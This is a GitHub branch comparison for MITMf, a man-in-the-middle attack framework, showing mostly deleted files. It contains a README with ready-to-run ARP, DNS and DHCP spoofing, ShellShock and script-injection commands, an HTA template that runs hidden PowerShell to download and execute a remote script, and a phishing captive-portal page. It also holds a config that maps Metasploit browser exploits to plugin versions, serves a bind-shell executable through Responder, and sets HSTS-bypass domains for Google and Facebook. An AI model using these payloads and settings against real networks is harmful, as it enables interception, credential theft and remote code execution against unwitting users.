Compare commits

..

No commits in common. "master" and "v0.5" have entirely different histories.

139 changed files with 2137 additions and 16862 deletions

View file

@ -1,8 +0,0 @@
[run]
branch = True
[report]
include = *core*, *libs*, *plugins*
exclude_lines =
pragma: nocover
pragma: no cover

62
.gitignore vendored
View file

@ -1,63 +1,3 @@
*.pyc
/plugins/old_plugins/
backdoored/
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# OSX Stuff
.DS_Store
._.DS_Store

4
.gitmodules vendored
View file

@ -1,3 +1,3 @@
[submodule "libs/bdfactory"]
path = libs/bdfactory
[submodule "bdfactory"]
path = bdfactory
url = https://github.com/secretsquirrel/the-backdoor-factory

View file

@ -1,27 +0,0 @@
language: python
python:
- "2.7"
addons:
apt:
packages:
- libpcap0.8-dev
- libnetfilter-queue-dev
- libssl-dev
notifications:
irc:
channels:
- "irc.freenode.org#MITMf"
template:
- "%{repository}#%{build_number} (%{branch} - %{commit} - %{commit_subject} : %{author}): %{message}"
skip_join: true
use_notice: true
install: "pip install -r requirements.txt"
before_script:
- "pip install python-coveralls"
script:
- "nosetests --with-cov"
after_success:
- coveralls

View file

@ -1,47 +0,0 @@
- Added active filtering/injection into the framework
- Fixed a bug in the DHCP poisoner which prevented it from working on windows OS's
- Made some preformance improvements to the ARP spoofing poisoner
- Refactored Appcachepoison , BrowserSniper plugins
- Refactored proxy plugin API
-Inject plugin now uses BeautifulSoup4 to parse and inject HTML/JS
- Added HTA Drive by plugin
- Added the SMBTrap plugin
- Config file now updates on the fly!
- SessionHijacker is replaced with Ferret-NG captures cookies and starts a proxy that will feed them to connected clients
- JavaPwn plugin replaced with BrowserSniper now supports Java, Flash and browser exploits
- Addition of the Screenshotter plugin, able to render screenshots of a client's browser at regular intervals
- Addition of a fully functional SMB server using the [Impacket](https://github.com/CoreSecurity/impacket) library
- Addition of [DNSChef](https://github.com/iphelix/dnschef), the framework is now a IPv4/IPv6 (TCP & UDP) DNS server! Supported queries are: 'A', 'AAAA', 'MX', 'PTR', 'NS', 'CNAME', 'TXT', 'SOA', 'NAPTR', 'SRV', 'DNSKEY' and 'RRSIG'
- Integrated [Net-Creds](https://github.com/DanMcInerney/net-creds) currently supported protocols are: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos
- Integrated [Responder](https://github.com/SpiderLabs/Responder) to poison LLMNR, NBT-NS and MDNS and act as a rogue WPAD server
- Integrated [SSLstrip+](https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014
- Spoof plugin can now exploit the 'ShellShock' bug when DHCP spoofing
- Spoof plugin now supports ICMP, ARP and DHCP spoofing
- Usage of third party tools has been completely removed (e.g. Ettercap)
- FilePwn plugin re-written to backdoor executables zip and tar files on the fly by using [the-backdoor-factory](https://github.com/secretsquirrel/the-backdoor-factory) and code from [BDFProxy](https://github.com/secretsquirrel/BDFProxy)
- Added [msfrpc.py](https://github.com/byt3bl33d3r/msfrpc/blob/master/python-msfrpc/msfrpc.py) for interfacing with Metasploit's RPC server
- Added [beefapi.py](https://github.com/byt3bl33d3r/beefapi) for interfacing with BeEF's RESTfulAPI
- Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here: http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html)

View file

@ -1,52 +0,0 @@
Contributing
============
Hi! Thanks for taking the time and contributing to MITMf! Pull requests are always welcome!
Submitting Issues/Bug Reporting
=============
Bug reporting is an essential part of any project since it let's people know whats broken!
Before reading on, here's a list of cases where you **shouldn't** be reporting the bug:
- If you haven't installed MITMf using method described in the [installation](https://github.com/byt3bl33d3r/MITMf/wiki/Installation) intructions. (your fault!)
- If you're using and old version of the framework (and by old I mean anything else that **isn't** the current version on Github)
- If you found a bug in a packaged version of MITMf (e.g. Kali Repos), please file a bug report with the distros maintaner
Lately, there has been a sharp **increase** in the volume of bug reports so in order for me to make any sense out of them and to quickly identify, reproduce and push a fix I do pretend a minimal amount of cooperation from the reporter!
Writing the report
==================
**Before submitting a bug familiarize yourself with [Github markdown](https://help.github.com/articles/github-flavored-markdown/) and use it in your report!**
After that, open an issue ticket and please describe the bug in **detail!** MITMf has a lot of moving parts so the more detail the better!
Include in the report:
- The full command string you used
- The full output of: ```pip freeze```
- The full output of MITMf in debug mode (append ```--log debug``` to the command you used)
- The OS you're using (distribution and architecture)
- The full error traceback (If any)
- If the bug resides in the way MITMf sends/receives packets, include a link to a pcap containing a full packet capture
Some good & bad examples
=========================
- How to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/71
https://github.com/byt3bl33d3r/MITMf/issues/70
https://github.com/byt3bl33d3r/MITMf/issues/64
- How not to write a bug report
https://github.com/byt3bl33d3r/MITMf/issues/35 <-- My personal favorite
https://github.com/byt3bl33d3r/MITMf/issues/139
https://github.com/byt3bl33d3r/MITMf/issues/138
https://github.com/byt3bl33d3r/MITMf/issues/128
https://github.com/byt3bl33d3r/MITMf/issues/52

View file

@ -1,22 +0,0 @@
# Intentional contributors (in no particular order)
- @rthijssen
- @ivangr0zni (Twitter)
- @xtr4nge
- @DrDinosaur
- @secretsquirrel
- @binkybear
- @0x27
- @golind
- @mmetince
- @niallmerrigan
- @auraltension
- @HAMIDx9
# Unintentional contributors and/or projects that I stole code from
- Metasploit Framework's os.js and Javascript Keylogger module
- Responder by Laurent Gaffie
- The Backdoor Factory and BDFProxy
- ARPWatch module from the Subterfuge Framework
- Impacket's KarmaSMB script

184
README.md Executable file → Normal file
View file

@ -1,171 +1,43 @@
![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)
![Latest Version](https://img.shields.io/badge/mitmf-0.9.8%20--%20The%20Dark%20Side-red.svg)
![Supported OS](https://img.shields.io/badge/Supported%20OS-Linux-yellow.svg)
[![Code Climate](https://codeclimate.com/github/byt3bl33d3r/MITMf/badges/gpa.svg)](https://codeclimate.com/github/byt3bl33d3r/MITMf)
[![Build Status](https://travis-ci.org/byt3bl33d3r/MITMf.svg)](https://travis-ci.org/byt3bl33d3r/MITMf)
[![Coverage Status](https://coveralls.io/repos/byt3bl33d3r/MITMf/badge.svg?branch=master&service=github)](https://coveralls.io/github/byt3bl33d3r/MITMf?branch=master)
# MITMf
MITMf
=====
Framework for Man-In-The-Middle attacks
**This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using [Bettercap](https://github.com/bettercap/bettercap) as it is far more feature complete and better maintained.**
Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it
Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io
This tool is completely based on sergio-proxy https://code.google.com/p/sergio-proxy/ and is an attempt to revive and update the project.
This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-proxy) and is an attempt to revive and update the project.
Availible plugins:
- Spoof - Redirect traffic using ARP Spoofing, DNS Spoofing or ICMP Redirects
- AppCachePoison - Perform app cache poison attacks
- BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
- CacheKill - Kills page caching by modifying headers
- FilePwn - Backdoor executables being sent over http using bdfactory
- Inject - Inject arbitrary content into HTML content
- JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins
- jskeylogger - Injects a javascript keylogger into clients webpages
- Replace - Replace arbitary content in HTML content
- SMBAuth - Evoke SMB challenge-response auth attempts
- Upsidedownternet - Flips images 180 degrees
Contact me at:
- Twitter: @byt3bl33d3r
- IRC on Freenode: #MITMf
- Email: byt3bl33d3r@protonmail.com
So far the most significant changes have been:
**Before submitting issues, please read the relevant [section](https://github.com/byt3bl33d3r/MITMf/wiki/Reporting-a-bug) in the wiki .**
- Spoof plugin is live !! Supports ICMP, ARP and DNS spoofing
(DNS Spoofing code was stolen from https://github.com/DanMcInerney/dnsspoof/)
Installation
============
- Usage of third party tools has been completely removed (e.g. ettercap)
Please refer to the wiki for [installation instructions](https://github.com/byt3bl33d3r/MITMf/wiki/Installation)
- Addition of the BrowserProfiler plugin
Description
============
MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving
existing attacks and techniques.
- Addition of the JsKeylogger plugin
Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely
re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.
- FilePwn plugin re-written to backdoor executables and zip files on the fly by using the-backdoor-factory
https://github.com/secretsquirrel/the-backdoor-factory and code from BDFProxy https://github.com/secretsquirrel/BDFProxy
Features
========
- Added msfrpc.py for interfacing with Metasploits rpc server
- The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
- Added Replace plugin
- As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better),
allowing users to modify any type of traffic or protocol.
- The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
- MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using [Net-Creds](https://github.com/DanMcInerney/net-creds), which is run on startup.
- [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.
Active packet filtering/modification
====================================
You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)
For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:
```python
if packet.haslayer(ICMP):
log.info('Got an ICMP packet!')
packet.dst = '192.168.1.0'
```
- Use the ```packet``` variable to access the packet in a Scapy compatible format
- Use the ```data``` variable to access the raw packet data
Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py```
You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;)
**Note**: you can modify filters on-the-fly without restarting MITMf!
Examples
========
The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:
```python mitmf.py -i enp3s0```
ARP poison the whole subnet with the gateway at 192.168.1.1 using the **Spoof** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1```
Same as above + a WPAD rogue proxy server using the **Responder** plugin:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad```
ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:
```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1```
Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1```
Enable LLMNR/NBTNS/MDNS spoofing:
```python mitmf.py -i enp3s0 --responder --wredir --nbtns```
Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):
```python mitmf.py -i enp3s0 --spoof --dhcp```
Same as above with a ShellShock payload that will be executed if any client is vulnerable:
```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'```
Inject an HTML IFrame using the **Inject** plugin:
```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com```
Inject a JS script:
```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js```
Start a captive portal that redirects everything to http://SERVER/PATH:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH```
Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive```
Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns```
Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR```
Same as above but with hostname:
```python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns```
And much much more!
Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)
For a complete list of available options, just run ```python mitmf.py --help```
# Currently available plugins
- **HTA Drive-By** : Injects a fake update notification and prompts clients to download an HTA application
- **SMBTrap** : Exploits the 'SMB Trap' vulnerability on connected clients
- **ScreenShotter** : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
- **Responder** : LLMNR, NBT-NS, WPAD and MDNS poisoner
- **SSLstrip+** : Partially bypass HSTS
- **Spoof** : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
- **BeEFAutorun** : Autoruns BeEF modules based on a client's OS or browser type
- **AppCachePoison** : Performs HTML5 App-Cache poisoning attacks
- **Ferret-NG** : Transparently hijacks client sessions
- **BrowserProfiler** : Attempts to enumerate all browser plugins of connected clients
- **FilePwn** : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
- **Inject** : Inject arbitrary content into HTML content
- **BrowserSniper** : Performs drive-by attacks on clients with out-of-date browser plugins
- **JSkeylogger** : Injects a Javascript keylogger into a client's webpages
- **Replace** : Replace arbitrary content in HTML content
- **SMBAuth** : Evoke SMB challenge-response authentication attempts
- **Upsidedownternet** : Flips images 180 degrees
- **Captive** : Creates a captive portal, redirecting HTTP requests using 302
# How to fund my tea & sushi reserve
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr
- Addition of the app-cache poisoning attack by Krzysztof Kotowicz
- JavaPwn plugin now live! Auto-detect and exploit clients with out-of-date java plugins using the Metasploit Frameworks rpc interface!!

1
bdfactory Submodule

@ -0,0 +1 @@
Subproject commit 35d67b82050a7e7315132185129f5e65a0893b75

View file

@ -1,2 +0,0 @@
;alert('AppCache Poison was here. Google Analytics FTW');

View file

@ -1,31 +0,0 @@
<html>
<head>
<title>Captive Portal</title>
<style>
<!--
body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;}
.content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;}
.blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;}
.title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;}
.details li { list-style: none; padding: 4px 0;}
.footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; }
-->
</style>
</head>
<body>
<center>
<div class="content blocking">
<div class="title" id="msg_title"><b>Client Required</b></div>
<ul class="details">
<div id="main_block">
<div id="msg_long_reason">
<li><b>Access has been blocked. Please download and install the new </b><span class="url"><a href="CaptiveClient.exe"><b>Captive Portal Client</b></a></span><b> in order to access internet resources.</b></li>
</div>
</ul>
</div>
<div class="footer">ISA Security <b>Captive Server</b></div>
</center>
</body>
</html>

View file

@ -1,4 +0,0 @@
<script>
var c = "powershell.exe -w hidden -nop -ep bypass -c \"\"IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:3000/ps/ps.png')); Invoke-ps\"\"";
new ActiveXObject('WScript.Shell').Run(c);
</script>

View file

@ -1,528 +0,0 @@
#
# MITMf configuration file
#
[MITMf]
# Required BeEF and Metasploit options
[[BeEF]]
host = 127.0.0.1
port = 3000
user = beef
pass = beef
[[Metasploit]]
rpcip = 127.0.0.1
rpcport = 55552
rpcpass = abc123
[[MITMf-API]]
host = 127.0.0.1
port = 9999
[[DNS]]
#
# Here you can configure MITMf's internal DNS server
#
tcp = Off # Use the TCP DNS proxy instead of the default UDP (not fully tested, might break stuff!)
port = 53 # Port to listen on
ipv6 = Off # Run in IPv6 mode (not fully tested, might break stuff!)
#
# Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
# can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
#
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27
*.captive.portal=192.168.1.100
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
[[[MX]]] # Queries for mail server records
*.thesprawl.org=mail.fake.com
[[[NS]]] # Queries for mail server records
*.thesprawl.org=ns.fake.com
[[[CNAME]]] # Queries for alias records
*.thesprawl.org=www.fake.com
[[[TXT]]] # Queries for text records
*.thesprawl.org=fake message
[[[PTR]]] # PTR queries
*.2.0.192.in-addr.arpa=fake.com
[[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
[[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
[[[SRV]]] #FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com
[[[DNSKEY]]] #FORMAT: flags protocol algorithm base64(key)
*.thesprawl.org=256 3 5 AQPSKmynfzW4kyBv015MUG2DeIQ3Cbl+BBZH4b/0PY1kxkmvHjcZc8nokfzj31GajIQKY+5CptLr3buXA10hWqTkF7H6RfoRqXQeogmMHfpftf6zMv1LyBUgia7za6ZEzOJBOztyvhjL742iU/TpPSEDhm2SNKLijfUppn1UaNvv4w==
[[[RRSIG]]] #FORMAT: covered algorithm labels labels orig_ttl sig_exp sig_inc key_tag name base64(sig)
*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=
#
# Plugin configuration starts here
#
[Captive]
# Set Server Port and string if we are serving our own portal from SimpleHTTPServer (80 is already used by default server)
Port = 8080
ServerString = "Captive Server 1.0"
# Set the filename served as /CaptivePortal.exe by integrated http server
PayloadFilename = config/captive/calc.exe
[Replace]
[[Regex1]]
'Google Search' = '44CON'
[[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
[Ferret-NG]
#
# Here you can specify the client to hijack sessions from
#
Client = '10.0.237.91'
[SSLstrip+]
#
#Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com
#
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
[Responder]
#Servers to start
SQL = On
HTTPS = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
LDAP = On
#Custom challenge
Challenge = 1122334455667788
#Specific IP Addresses to respond to (default = All)
#Example: RespondTo = 10.20.1.100-150, 10.20.3.10
RespondTo =
#Specific NBT-NS/LLMNR names to respond to (default = All)
#Example: RespondTo = WPAD, DEV, PROD, SQLINT
RespondToName =
#Specific IP Addresses not to respond to (default = None)
#Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
DontRespondTo =
#Specific NBT-NS/LLMNR names not to respond to (default = None)
#Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
[[HTTP Server]]
#Set to On to always serve the custom EXE
Serve-Always = Off
#Set to On to replace any requested .exe with the custom EXE
Serve-Exe = On
#Set to On to serve the custom HTML if the URL does not contain .exe
Serve-Html = Off
#Custom HTML to serve
HtmlFilename = config/responder/AccessDenied.html
#Custom EXE File to serve
ExeFilename = config/responder/BindShell.exe
#Name of the downloaded .exe that the client will see
ExeDownloadName = ProxyClient.exe
#Custom WPAD Script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}'
#HTML answer to inject in HTTP responses (before </body> tag).
#Set to an empty string to disable.
#In this example, we redirect make users' browsers issue a request to our rogue SMB server.
HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
[[HTTPS Server]]
#Configure SSL Certificates to use
SSLCert = config/responder/responder.crt
SSLKey = config/responder/responder.key
[AppCachePoison]
# HTML5 AppCache poisioning attack
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
# generic settings for tampering engine
#enable_only_in_useragents=Chrome|Firefox
templates_path=config/app_cache_poison_templates
# when visiting first url matching following expression we will embed iframes with all tamper URLs
#(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
# it's only useful to mass poison chrome because:
# - it supports iframe sandbox preventing framebusting
# - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[[test]]
# any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test # which templates to use for spoofing content?
skip_in_mass_poison=1
[[google]]
tamper_url_match = http://www.google.com\.*.
tamper_url = http://www.google.com
manifest_url = http://www.google.com/robots.txt
[[facebook]]
tamper_url=http://www.facebook.com/?_rdr
manifest_url=http://www.facebook.com/robots.txt
templates=facebook # use different template
[[twitter]]
tamper_url=http://twitter.com/
tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[[html5rocks]]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
[[ga]]
# we can also modify non-HTML URLs to append malicious code to them
# but for them to be cached in HTML5 AppCache they need to be referred in
# manifest for a poisoned domain
# if not, they are "only" cached for 10 years :D
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
[BrowserSniper]
#
# Currently only supports java, flash and browser exploits
#
# The version strings were pulled from http://www.cvedetails.com
#
# When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
#
msfport = 8080 # Port to start Metasploit's webserver which will host the exploits
[[exploits]]
[[[multi/browser/java_rhino]]] #Exploit's MSF path
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
Browser = Any #Can be set to Any, Chrome, Firefox, MSIE or browser + version (e.g IE 6)
Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
[[[multi/browser/java_atomicreferencearray]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
[[[multi/browser/java_jre17_jmxbean_2]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_jre17_reflection_types]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[multi/browser/java_verifier_field_access]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
[[[multi/browser/java_jre17_provider_skeleton]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Java
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
[[[exploit/windows/browser/adobe_flash_pcre]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
[[[exploit/windows/browser/adobe_flash_net_connection_confusion]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
[[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]]
Type = PluginVuln
OS = Windows
Browser = Any
Plugin = Flash
PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
[[[exploit/multi/browser/adobe_flash_opaque_background_uaf]]]
Type = PluginVuln
OS = Any
Browser = Any
Plugin = Flash
